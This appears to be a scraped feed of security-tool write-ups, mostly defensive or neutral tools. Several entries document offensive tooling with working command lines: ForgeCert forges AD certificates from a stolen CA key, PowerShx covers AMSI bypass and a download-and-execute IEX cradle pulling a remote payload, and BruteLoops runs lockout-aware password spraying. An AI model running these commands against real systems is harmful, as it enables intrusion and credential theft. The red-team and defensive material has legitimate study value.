Additionally, one can specify the level of the logs outputs by adding --loglevel <log_level>; supported log levels are: TRACE, DEBUG, INFO, WARN, ERROR, and FATAL.


Compiling with address/leak sanitizers

Sanitizers are great tools to debug your code. NetworKit provides additional CMake flags to enable address, leak, and undefined behavior sanitizers. To compile your code with sanitizers, set the CMake flag NETWORKIT_WITH_SANITIZERS to either address or leak:

cmake -DNETWORKIT_WITH_SANITIZERS=leak ..

By setting this flag to address, your code will be compiled with the address and the undefined sanitizers. Setting it to leak also adds the leak sanitizer.


Documentation

The most recent version of the documentation can be found online.


Contact

For questions regarding NetworKit, have a look at our issues-section and see if there is already an open discussion. If not feel free to open a new issue. To stay updated about this project, subscribe to our mailing list.


Contributions

We encourage contributions to the NetworKit source code. See the development guide for instructions. For support please contact the mailing list.


Credits

List of contributors can be found on the NetworKit website credits page.


External Code

The program source includes:


License

The source code of this program is released under the MIT License. We ask you to cite us if you use this code in your project (c.f. the publications section below and especially the technical report). Feedback is also welcome.


Publications

The NetworKit publications page lists the publications on NetworKit as a toolkit, on algorithms available in NetworKit, and simply using NetworKit. We ask you to cite the appropriate ones if you found NetworKit useful for your own research.



ForgeCert - "Golden" Certificates

14 October 2021 at 20:30
By: Unknown


ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.

This attack is codified as DPERSIST1 in our "Certified Pre-Owned" whitepaper. This code base was released ~45 days after the whitepaper was published.

@tifkin_ is the primary author of ForgeCert.

@tifkin_ and @harmj0y are the primary authors of the associated Active Directory Certificate Service research (blog and whitepaper).


Background

As described in the Background and Forging Certificates with Stolen CA Certificates - DPERSIST1 sections of our whitepaper, the private key for a Certificate Authority's CA certificate is protected on the CA server either via DPAPI or hardware (HSM/TPM). Additionally, the certificate (sans private key) is published to the NTAuthCertificates forest object, which defines CA certificates that enable authentication to AD. Put together, a CA whose certificate is present in NTAuthCertificates uses its private key to sign certificate signing requests (CSRs) from requesting clients. This graphic summarizes the process:

The security of the CA's private key is paramount. As mentioned, if the private key is not protected by a hardware solution like a TPM or a HSM, the key will be encrypted with the Data Protection API (DPAPI) and stored on disk on the CA server. If an attacker is able to compromise a CA server, they can extract the private key for any CA certificate not protected by hardware by using @gentilkiwi's Mimikatz or GhostPack's SharpDPAPI project. THEFT3 in the whitepaper describes this process for machine certificates.

Because the only key material used to sign issued certificates is the CA's private key, if an attacker steals such a key (for a certificate in NTAuthCertificates) they can forge certificates capable of domain authentication. These forged certificates can be for any principal in the domain (though the account needs to be "active" for authentication to be possible, so accounts like krbtgt will not work) and the certificates will be valid for as long as the CA certificate is valid (usually 5 years by default but can be set to be longer).

Also, as these certificates are not a product of the normal issuance process, the CA is not aware that they were created. Thus, the certificates cannot be revoked.

Note: the private key for ANY CA certificate in NTAuthCertificates (root or subordinate CA) can be used to forge certificates capable of authentication in the forest. If the certificate/key is from a subordinate CA, a legitimate CRL for verification of the certificate chain must be supplied.

ForgeCert uses the BouncyCastle's X509V3CertificateGenerator to perform the forgeries.


Command Line Usage
C:\Temp>ForgeCert.exe
ForgeCert 1.0.0.0
Copyright c 2021

ERROR(S):
Required option 'CaCertPath' is missing.
Required option 'SubjectAltName' is missing.
Required option 'NewCertPath' is missing.
Required option 'NewCertPassword' is missing.

--CaCertPath Required. CA private key as a .pfx or .p12 file

--CaCertPassword Password to the CA private key file

--Subject (Default: CN=User) Subject name in the certificate

--SubjectAltName Required. UPN of the user to authenticate as

--NewCertPath Required. Path where to save the new .pfx certificate

--NewCertPassword Required. Password to the .pfx file

--CRL ldap path to a CRL for the forged certificate

--help Display this help screen.

--version Display version information.


Usage

Note: for a complete walkthrough of stealing a CA private key and forging auth certs, see DPERSIST1 in the whitepaper.

Context:

  • The stolen CA's certificate is ca.pfx, encrypted with a password of Password123!
  • The subject is arbitrary since we're specifying a subject alternative name for the certificate.
  • The subject alternative name (i.e., the user we're forging a certificate for) is localadmin@theshire.local.
  • The forged certificate will be saved as localadmin.pfx, encrypted with the password NewPassword123!
C:\Tools\ForgeCert>ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "Password123!" --Subject "CN=User" --SubjectAltName "localadmin@theshire.local" --NewCertPath localadmin.pfx --NewCertPassword "NewPassword123!"
CA Certificate Information:
Subject: CN=theshire-DC-CA, DC=theshire, DC=local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 1/4/2021 10:48:02 AM
End Date: 1/4/2026 10:58:02 AM
Thumbprint: 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2
Serial: 14BFC25F2B6EEDA94404D5A5B0F33E21

Forged Certificate Information:
Subject: CN=User
SubjectAltName: localadmin@theshire.local
Issuer: CN=theshire-DC-CA, DC=theshire, DC=local
Start Date: 7/26/2021 3:38:45 PM
End Date: 7/26/2022 3:38:45 PM
Thumbprint: C5789A24E91A40819EFF7CFD77150595F8B9878D
Serial: 3627A48F90F6869C3215FF05BC3B2E42

Done. Saved forged certificate to localadmin.pfx with the password 'NewPassword123!'

This forgery can be done on an attacker-controlled system, and the resulting certificate can be used with Rubeus to request a TGT (and/or retrieve the user's NTLM ;)
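For instance, a Rubeus invocation along these lines (values carried over from the forgery above; consult the Rubeus documentation for exact options):

Rubeus.exe asktgt /user:localadmin /certificate:localadmin.pfx /password:NewPassword123!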


Defensive Considerations

The TypeRefHash of the current ForgeCert codebase is b26b451ff2c947ae5904f962e56facbb45269995fbb813070386472f307cfcf0.

The TypeLib GUID of ForgeCert is bd346689-8ee6-40b3-858b-4ed94f08d40a. This is reflected in the Yara rules currently in this repo.

See PREVENT1, DETECT3, and DETECT5 in our whitepaper for prevention and detection guidance.

Fabian Bader published a great post on how to mitigate many uses of "Golden Certificates" through OCSP tweaks. Note though that in the Final Thoughts section he mentions: "This method is not bulletproof at all. Since the attacker is in charge of the certificate creation process, she could just change the serial number to a valid one." This was implemented in his PR, though remember that by default the serial number will be randomized, meaning the OCSP prevention should work in many cases and is worth implementing in our opinion.

We believe there may be opportunities to build Yara/other detection rules for the types of forged certificates this project produces. If any defensive researchers find a good way to signature these files, please let us know and we will update the Yara rules/defensive guidance here.


Reflections

There is a clear parallel between "Golden Tickets" (forged TGTs) and these "Golden Certificates" (forged AD CS certs). Both the krbtgt hash and CA private key are cryptographic material critical to the security of an Active Directory environment, and both can be used to forge authenticators for arbitrary users. However, while the krbtgt hash can be retrieved remotely over DCSync, a CA private key must (at least as far as we know) be recovered through code execution on the CA machine itself. While a krbtgt hash can be rotated relatively easily, rotating a CA private key is significantly more difficult.

On the subject of public disclosure, we self-embargoed the release of our offensive tooling (ForgeCert as well as Certify) for ~45 days after we published our whitepaper in order to give organizations a chance to get a grip on the issues surrounding Active Directory Certificate Services. However, we have found that organizations and vendors have historically often not fixed issues or built detections for "theoretical" attacks until someone proves something is possible with a proof of concept.

This is reflected in some people's reaction to the research of this IS StUPId, oF COurse YoU Can FORge CERts WITH ThE ca PriVAtE KeY. To which we state, yes, many things are possible, but PoC||GTFO



Xmap - A Fast Network Scanner Designed For Performing Internet-wide IPv6 & IPv4 Network Research Scanning

14 October 2021 at 11:30
By: Zion3R


XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bit address space in under 45 minutes. With a 10 GigE connection and PF_RING, XMap can scan the 32-bit address space in under 5 minutes. Moreover, leveraging the novel IPv6 scanning approach, XMap can discover the IPv6 Network Periphery fast. Furthermore, XMap can scan the network space randomly with any length and at any position, such as 2001:db8::/32-64 and 192.168.0.1/16-20. Besides, XMap can probe multiple ports simultaneously.

XMap operates on GNU/Linux, Mac OS, and BSD. XMap currently has implemented probe modules for ICMP Echo scans, TCP SYN scans, and UDP probes.

With the banner grab and TLS handshake tool ZGrab2, more involved scans can be performed.


Installation

The latest stable release of XMap is version 1.0.0 and supports Linux, macOS, and BSD. We recommend installing XMap from HEAD rather than using a distro package manager (not supported yet).

Instructions on building XMap from source can be found in INSTALL.


Usage

A guide to using XMap can be found in our GitHub Wiki.

Simple commands and options to using XMap can be found in USAGE.


Paper

Fast IPv6 Network Periphery Discovery and Security Implications.

Abstract. Numerous measurement studies have been performed to discover IPv4 network security issues by leveraging fast Internet-wide scanning techniques. However, IPv6 brings a 128-bit address space and renders brute-force network scanning impractical. Although significant efforts have been dedicated to enumerating active IPv6 hosts, limited by technique efficiency and probing accuracy, large-scale empirical measurement studies under the increasing IPv6 networks are infeasible now.

To fill this research gap, by leveraging the extensively adopted IPv6 address allocation strategy, we propose a novel IPv6 network periphery discovery approach. Specifically, XMap, a fast network scanner, is developed to find the periphery, such as a home router. We evaluate it on twelve prominent Internet service providers and harvest 52M active peripheries. Grounded on these found devices, we explore IPv6 network risks of the unintended exposed security services and the flawed traffic routing strategies. First, we demonstrate the unintended exposed security services in IPv6 networks, such as DNS, and HTTP, have become emerging security risks by analyzing 4.7M peripheries. Second, by inspecting the periphery's packet routing strategies, we present the flawed implementations of IPv6 routing protocol affecting 5.8M router devices. Attackers can exploit this common vulnerability to conduct effective routing loop attacks, inducing DoS to the ISP's and home routers with an amplification factor of >200. We responsibly disclose those issues to all involved vendors and ASes and discuss mitigation solutions. Our research results indicate that the security community should revisit IPv6 network strategies immediately.

Authors. Xiang Li, Baojun Liu, Xiaofeng Zheng, Haixin Duan, Qi Li, Youjun Huang.

Conference. Proceedings of the 2021 IEEE/IFIP International Conference on Dependable Systems and Networks (DSN '21)

Paper. [PDF], [Slides] and [Video].

CNVD/CVE. [Lists].


License and Copyright

XMap Copyright 2021 Xiang Li from Network and Information Security Lab Tsinghua University

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See LICENSE for the specific language governing permissions and limitations under the License.



PowerShx - Run Powershell Without Software Restrictions

13 October 2021 at 20:30
By: Zion3R


Unmanaged PowerShell execution using DLLs or a standalone executable.


Introduction

PowerShx is a rewrite and expansion of the PowerShdll project. PowerShx provides functionality for bypassing AMSI and running PS Cmdlets.


Features
  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe or regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32
rundll32 PowerShx.dll,main -e <PS script to run>
rundll32 PowerShx.dll,main -f <path>                   Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet>    Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w                          Start an interactive console in a new window
rundll32 PowerShx.dll,main -i                          Start an interactive console
rundll32 PowerShx.dll,main -s                          Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v                          Print execution output to the console

Alternatives (Credit to SubTee for these techniques):
1. 
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe version
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the PsSession.cs -> Handle() method. Example:

private void Handle(Options options)
{
    // Pre-execution before user script
    _ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode
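Any base64 encoder can produce the BASE64 placeholder used above; a minimal Python sketch (the script content is a hypothetical payload):

import base64

# [System.Text.Encoding]::Default decodes with the system ANSI code page,
# so plain ASCII content round-trips safely.
script = 'Write-Host "hello"'  # hypothetical payload
print(base64.b64encode(script.encode("ascii")).decode())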


Run a script from a URL
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

Requirements

.NET 4


Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interactive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output; otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.



Rdesktop - Open Source Client for Microsoft's RDP protocol

13 October 2021 at 11:30
By: Zion3R


rdesktop is an open source client for Microsoft's RDP protocol. It is known to work with Windows versions ranging from NT 4 Terminal Server to Windows 2012 R2 RDS. rdesktop currently has implemented the RDP version 4 and 5 protocols.


Installation

rdesktop uses a GNU-style build procedure. Typically all that is necessary to install rdesktop is the following:

% ./configure
% make
% make install

The default is to install under /usr/local. This can be changed by adding --prefix=<directory> to the configure line.

The smart-card support module uses PCSC-lite. You should use PCSC-lite 1.2.9 or later. To enable smart-card support in rdesktop, add --enable-smartcard to the configure line.


Note for users building from source

If you have retrieved a snapshot of the rdesktop source, you will first need to run ./bootstrap in order to generate the build infrastructure. This is not necessary for release versions of rdesktop.


Usage

Connect to an RDP server with:

% rdesktop server

where server is the name of the Terminal Services machine. If you receive "Connection refused", this probably means that the server does not have Terminal Services enabled, or there is a firewall blocking access.

You can also specify a number of options on the command line. These are listed in the rdesktop manual page (run man rdesktop).



Shisho - Lightweight Static Analyzer For Several Programming Languages

12 October 2021 at 20:30
By: Zion3R


Shisho is a lightweight static analyzer for developers.


Please see the usage documentation for further information.



Try at Playground

You can try Shisho at our playground.


Try with Docker

You can try shisho on your machine as follows:

echo "func test(v []string) int { return len(v) + 1; }" | docker run -i ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go
echo "func test(v []string) int { return len(v) + 1; }" > file.go
docker run -i -v $(pwd):/workspace ghcr.io/flatt-security/shisho-cli:latest find "len(:[...])" --lang=go /workspace/file.go

Install with pre-built binaries

When you'd like to run shisho outside docker containers, please follow the instructions below:


Linux / macOS

Run the following command(s):

# Linux
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-unknown-linux-gnu.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

# macOS
wget https://github.com/flatt-security/shisho/releases/latest/download/build-x86_64-apple-darwin.zip -O shisho.zip
unzip shisho.zip
chmod +x ./shisho
mv ./shisho /usr/local/bin/shisho

Then you'll find the shisho executable in /usr/local/bin.
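Once the binary is installed, the same search from the Docker example above runs directly against a local file:

echo "func test(v []string) int { return len(v) + 1; }" > file.go
shisho find "len(:[...])" --lang=go file.go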


Windows

Download the pre-built binary from releases and put it into a directory on your %PATH%.

If you're using Windows Subsystem for Linux, you can install shisho with the above instructions.


More


LinuxCatScale - Incident Response Collection And Processing Scripts With Automated Reporting Scripts

12 October 2021 at 11:30
By: Zion3R


Linux CatScale is a bash script that uses living-off-the-land tools to collect extensive data from Linux-based hosts. The data aims to help DFIR professionals triage and scope incidents. An ELK Stack instance can also be configured to consume the output and assist the analysis process.


Usage

These scripts were built to automate as much as possible. We recommend running them from an external device/USB to avoid overwriting evidence, in case you need a full disk image in the future.

Please run the collection script on suspected hosts with sudo rights. fsecure_incident-response_linux_collector_0.7.sh is the only file you need to run for the collection.

user@host:<dir>$ chmod +x ./Cat-Scale.sh
user@host:<dir>$ sudo ./Cat-Scale.sh

The script will create a directory called "FSecure-out" in the working directory and should remove all artefacts after they have been compressed. This leaves a single archive named in the format FSecure_Hostname-YYMMDD-HHMM.tar.gz

Once these are aggregated and you have the FSecure_Hostname-YYMMDD-HHMM.tar.gz archives on the analysis machine, you can run Extract-Cat-Scale.sh, which will extract all the files and place them in a folder called "extracted".

user@host:<dir>$ chmod +x ./Extract-Cat-Scale.sh
user@host:<dir>$ sudo ./Extract-Cat-Scale.sh
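If you need to unpack a single archive without the helper script, a standard tar invocation also works (the filename follows the naming pattern above):

mkdir -p extracted && tar -xzf FSecure_Hostname-YYMMDD-HHMM.tar.gz -C extracted/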

Parsing

This project has predefined grok filters to ingest data into elastic, feel free to modify them as you need.


What does it collect?

This script will produce the following files/folders, which can be reviewed as text files or using an ELK Stack.

bash_history                    - Bash history for all users
bash_profile - Bash profile file for all users
bash_rc - Bash_rc file
full-timeline.csv - Timeline of all files in the following directories: /home/* + /var/www/* + /tmp/ + /dev/shm/ + /bin + /sbin
bin-dir-timeline - Timeline of all files in /bin
binhashes.txt - Hash of all executable files under $PATH variable
btmp-lastlog.txt - btmp last log
console-error-log.txt - Where all errors from the script are forwarded
cpuinfo.txt - CPU info
dev-shm-dir-timeline - Timeline of all files in /dev/shm/
df.txt - Information about the file system on which each FILE resides, or all file systems by default.
dhcp.txt - Resolver configuration file resolv.conf
executables-list.txt - All ELF files on disk with +x attribute
group.txt - List of groups and the members belonging to each group
home-dir-timeline - Timeline of all files in /home/*
host.conf.txt - Resolver configuration file host.conf
hosts.allow.txt - Host access control file hosts.allow
hosts.deny.txt - Host access control file hosts.deny
hosts.txt - Static table lookup for hostnames /etc/hosts
ifconfig.txt - ifconfig -a Output
iptables.txt - Tables of IPv4 and IPv6 packet filter rules in the Linux kernel.
lastbad.txt - Records failed login attempts
lastlog.txt - The most recent login of all users or of a given user
last.txt - History of all logins and logouts
lsmod.txt - Kernel modules currently loaded
lsof-processes.txt - List of all open files and the processes that opened them.
lsusb.txt - Attached USB device info
md5-ps.txt - MD5 hash of the ps command binary
meminfo.txt - Memory info
netstat-ano.txt - Listing All Sockets, in numeric form with timer info
netstat-antup.txt - All tcp/udp connection in numeric form with process ID
netstat-list.txt - All tcp/udp connection in numeric form with process ID without headers
num-proc.txt - number of processes according to ps command
num-ps.txt - number of processes according to /proc directory
package-list.txt - All files in all rpm packages
packages-result.txt - All executables that are not part of rpm packages
passwd.txt - Copy of the passwd file
persistence-anacron.txt - All Anacron jobs
persistence-cronlist.txt - All Cron jobs
persistence-initd.txt - All initd scripts
persistence-profiled.txt - Scripts that run when User logs in
persistence-rc-scripts.txt - All rc scripts (run level scripts)
persistence-shellrc-etc.txt - All startup script contents in /etc/
persistence-shellrc-home.txt - All startup script contents in /home/
persistence-shellrc-root.txt - All startup script contents in /root/
persistence-systemdlist.txt - All systemd services and execution commandlines
process-details.txt - All running process details and status information
processes-list.txt - All running processes according to ps
processes.txt - All running processes according to the /proc/ directory
processhashes.txt - Hash of all running processes
procmod.txt - Loaded modules for all processes
release.txt - OS information
routetable.txt - Contents of kernel routing table. route command output
sbin-dir-timeline - Timeline of all files in /sbin/*
service_status.txt - All running services and their status.
ssh_config.txt - ssh service config file
sshd_config.txt - ssh service config file
sudoers.txt - List of sudoers
tmp-dir-timeline - Timeline of all files in /tmp/*
tmp-executable-files-for-diff.txt - tmp-executable-files.txt without executable type metadata for later diff operation with packages
tmp-executable-files.txt - All files with +x attributes (executables)
tmp-types.txt - Temporary file for finding types of executables (script|ELF|executable)
var-www-dir-timeline - Timeline of all files in /var/www/*
whoandwhat.txt - w command output. Who is logged on and what they are doing.
who.txt - List of users who are currently logged in
wtmp-lastlog.txt - wtmp last log
varlogs - All contents of /var/log
viminfo - All viminfo files; can contain vi command history

Disclaimer

Note that the script will likely alter artefacts on endpoints. Care should be taken when using the script. This is not meant to take forensically sound disk images of the remote endpoints.


Tested OSes
  • Ubuntu 16.04
  • Centos
  • Mint
  • Solaris 11.4


Azur3Alph4 - A PowerShell Module That Automates Red-Team Tasks For Ops On Objective

11 October 2021 at 20:30
By: Zion3R


Azur3Alph4 is a PowerShell module that automates red-team tasks for ops on objective. This module is designed for a post-breach (RCE achieved) position; token extraction and many other tools will not execute successfully without starting from it. The module should be used for further enumeration and movement in a compromised app that is part of a managed identity.
Azur3Alph4 is currently in development. Modules are being worked on and updated, and most of this is still untested.

Scripts are in repo for individual use and easy identification, but the .psm1 file is what will be consistently updated.


Installation & Usage

Import-Module Azur3Alph4

Point the $envendpoint variable at the command-execution endpoint that passes "env" to the Azure backend.


Updates - 8/10/2021
  • Added Get-ResourceActions.ps1 and updated Azur3Alph4.psm1

Updates - 8/5/2021
  • Made Azur3Alph4 modular
  • Added Get-SubscriptionId function

Why This Was Built
  • I built this because I wanted to learn more about both PowerShell and Azure, two things I'd definitely like to get better at.
  • To help automate and eliminate a lot of repetitive PS commands.
  • To build off my current knowledge of Azure red teaming

Function List

Get-Endpoint

Enumerates an Azure endpoint to verify whether or not it belongs to a managed identity


Get-ManagedIdentityToken

Grabs the Managed Identity Token from the endpoint using the extracted secret. Stores the value in a given variable
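For context, on an Azure App Service host the platform exposes the managed identity endpoint through environment variables. A minimal hand-rolled sketch of grabbing a token looks like this (this illustrates the platform mechanism, not necessarily the module's exact implementation):

# IDENTITY_ENDPOINT and IDENTITY_HEADER are injected by Azure App Service
$token = Invoke-RestMethod -Headers @{ "X-IDENTITY-HEADER" = $env:IDENTITY_HEADER } -Uri "$($env:IDENTITY_ENDPOINT)?resource=https://management.azure.com/&api-version=2019-08-01"
$token.access_token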


Connect-AzAccount

Takes username and password variables, automates the SecureString conversion, and connects to an Azure account


Get-SubscriptionId

Gets the subscription ID using the REST API for Azure


Get-ManagedIdentityResources

Uses the subscription ID to enumerate all resources that are accessible


Get-ResourceActions.ps1

Enumerates all resources available using Azure token and lists permissions of each resource directly below it


Credits
  • Big shout out to @nikhil_mitt for the CARTP course that got me started in Azure


BruteLoops - Protocol Agnostic Online Password Guessing API

11 October 2021 at 11:30
By: Zion3R


A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.

See various Wiki sections for more information.

A "modular" example is included with the library that demonstrates how to use this package. It's fully functional and provides multiple brute force modules. Below is a sample of its capabilities:


http.accellion_ftp   Accellion FTP HTTP interface login module
http.basic_digest    Generic HTTP basic digest auth
http.basic_ntlm      Generic HTTP basic NTLM authentication
http.global_protect  Global Protect web interface
http.mattermost      Mattermost login web interface
http.netwrix         Netwrix web login
http.okta            Okta JSON API
http.owa2010         OWA 2010 web interface
http.owa2016         OWA 2016 web interface
smb.smb              Target a single SMB server
testing.fake         Fake authentication module for training/testing

Key Features
  • Protocol agnostic - If a callback can be written in Python, BruteLoops can be used to attack it
  • SQLite support - All usernames, passwords, and credentials are maintained in an SQLite database.
    • A companion utility (dbmanager.py) creates and manages input databases
  • Spray and Stuffing Attacks in One Tool - BruteLoops supports both spray and stuffing attacks in the same attack logic and database, meaning that you can configure a single database and run the attack without heavy reconfiguration and confusion.
  • Guess scheduling - Each username in the SQLite database is configured with a timestamp that is updated after each authentication event. This means we can significantly reduce the likelihood of locking accounts by scheduling each authentication event with precision (see the sketch after this list).
  • Fine-grained configurability to avoid lockout events - Microsoft's lockout policies can be matched 1-to-1 using BruteLoops' parameters:
    • auth_threshold = Lockout Threshold
    • max_auth_jitter = Lockout Observation Window
    • Timestamps associated with each authentication event are tracked in BruteLoops' SQLite database. Each username receives a distinct timestamp to assure that authentication events are highly controlled.
  • Attack resumption - Stopping and resuming an attack is possible without worrying about losing your place in the attack or locking accounts.
  • Multiprocessing - Speed up attacks using multiprocessing! By configuring the parallel guess count, you're effectively telling BruteLoops how many usernames to guess in parallel.
  • Logging - Each authentication event can optionally be logged to disk. This information can be useful during red teams by providing customers with a detailed attack timeline that can be mapped back to logged events.
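To illustrate the scheduling idea, here is a generic Python sketch of the technique (not BruteLoops' actual code; the parameter names simply mirror the options above, and times are epoch seconds):

import random

def next_guess_time(last_auth, auth_threshold, observation_window, max_auth_jitter):
    # Keep each account below auth_threshold failures within one observation
    # window, then add random jitter so guesses don't land on a predictable
    # schedule.
    min_interval = observation_window / max(auth_threshold - 1, 1)
    return last_auth + min_interval + random.uniform(0, max_auth_jitter)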

Dependencies

BruteLoops requires Python 3.7 or newer and SQLAlchemy 1.3.0, the latter of which can be obtained via pip and the requirements.txt file in this repository: python3.7 -m pip install -r requirements.txt


Installation
git clone https://github.com/arch4ngel/bruteloops
cd bruteloops
python3 -m pip install -r requirements.txt

How do I use this Damn Thing?

Jeez, alright already...we can break an attack down into a few steps:

  1. Find an attackable service
  2. If one isn't already available in the example.py[1] directory, build a callback
  3. Find some usernames, passwords, and credentials
  4. Construct a database by passing the authentication data to dbmanager.py[2]
  5. If relevant, enumerate or request the AD lockout policy to intelligently configure the attack
  6. Execute the attack in alignment with the target lockout policy[1][3][4]


FUSE - A Penetration Testing Tool For Finding File Upload Bugs

10 October 2021 at 20:30
By: Zion3R


FUSE is a penetration testing system designed to identify Unrestricted Executable File Upload (UEFU) vulnerabilities. The details of the testing strategy are in our paper, "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared at NDSS 2020. To see how to configure and execute FUSE, see the following sections.


Setup

Install

FUSE currently works on Ubuntu 18.04 and Python 2.7.15.

  1. Install dependencies
# apt-get install rabbitmq-server
# apt-get install python-pip
# apt-get install git
  2. Clone and build FUSE
$ git clone https://github.com/WSP-LAB/FUSE
$ cd FUSE && pip install -r requirements.txt
  • If you plan to leverage headless browser verification using Selenium, please install the Chrome and Firefox web drivers by referring to the Selenium documentation.

Usage

Configuration
  • FUSE uses a user-provided configuration file that specifies parameters for a target PHP application. The configuration file must be filled out before testing a target web application. You can check out the README file and the example configuration files.

  • Configuration for File Monitor (Optional)

$ vim filemonitor.py

...
MONITOR_PATH='/var/www/html/'    <- Web root of the target application
MONITOR_PORT=20174               <- Default port of File Monitor
EVENT_LIST_LIMITATION=8000       <- Maximum number of elements in EVENT_LIST
...

Execution
  • FUSE
$ python framework.py [Path of configuration file]
  • File Monitor
$ python filemonitor.py
  • Result
    • When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created.
    • The [HOST] folder stores the files that FUSE attempted to upload.
    • The [HOST_report.txt] file contains test results and information about the files that triggered U(E)FU.

CVEs

If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR updating README.md.

Application     CVEs
Elgg            CVE-2018-19172
ECCube3         CVE-2018-18637
CMSMadeSimple   CVE-2018-19419, CVE-2018-18574
CMSimple        CVE-2018-19062
Concrete5       CVE-2018-19146
GetSimpleCMS    CVE-2018-19420, CVE-2018-19421
Subrion         CVE-2018-19422
OsCommerce2     CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966
Monstra         CVE-2018-6383, CVE-2018-18694
XE              XEVE-2019-001

Author

This research project has been conducted by WSP Lab at KAIST.


Citing FUSE

To cite our paper:

@INPROCEEDINGS{lee:ndss:2020,
author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son},
title = {{FUSE}: Finding File Upload Bugs via Penetration Testing},
booktitle = {Proceedings of the Network and Distributed System Security Symposium},
year = 2020
}


Qu1cksc0pe - All-in-One Static Malware Analysis Tool

10 October 2021 at 11:30
By: Zion3R


This tool allows you to statically analyze Windows, Linux, OSX executables and APK files.

You can get:

  • What DLL files are used.
  • Functions and APIs.
  • Sections and segments.
  • URLs, IP addresses and emails.
  • Android permissions.
  • File extensions and their names.
    And so on...

Qu1cksc0pe aims to gather even more information about suspicious files and helps users realize what the file is capable of.


Usage
python3 qu1cksc0pe.py --file suspicious_file --analyze

Setup

Necessary python modules:

  • puremagic => Analyzing target OS and magic numbers.
  • androguard => Analyzing APK files.
  • apkid => Check for Obfuscators, Anti-Disassembly, Anti-VM and Anti-Debug.
  • prettytable => Pretty outputs.
  • tqdm => Progressbar animation.
  • colorama => Colored outputs.
  • oletools => Analyzing VBA Macros.
  • pefile => Gathering all information from PE files.
  • quark-engine => Extracting IP addresses and URLs from APK files.
  • pyaxmlparser => Gathering information from target APK files.
  • yara-python => Android library scanning with Yara rules.
  • prompt_toolkit => Interactive shell.


Installation of python modules: pip3 install -r requirements.txt
Gathering other dependencies:

  • VirusTotal API Key: https://virustotal.com
  • Binutils: sudo apt-get install binutils
  • ExifTool: sudo apt-get install exiftool
  • Strings: sudo apt-get install strings

Alert

You must specify jadx binary path in Systems/Android/libScanner.conf

[Rule_PATH]
rulepath = /Systems/Android/YaraRules/

[Decompiler]
decompiler = JADX_BINARY_PATH <-- You must specify this.
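If jadx is already installed and on your PATH, one way to find the value to paste in (assuming a Unix-like system; the path below is example output):

$ which jadx
/usr/local/bin/jadx   <-- use this path as JADX_BINARY_PATH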

Installation
  • You can install Qu1cksc0pe easily on your system. Just execute the following command.
    Command 0: sudo pip3 install -r requirements.txt
    Command 1: sudo python3 qu1cksc0pe.py --install

Scan arguments

Normal analysis

Usage: python3 qu1cksc0pe.py --file suspicious_file --analyze


Multiple analysis

Usage: python3 qu1cksc0pe.py --multiple FILE1 FILE2 ...


Hash scan

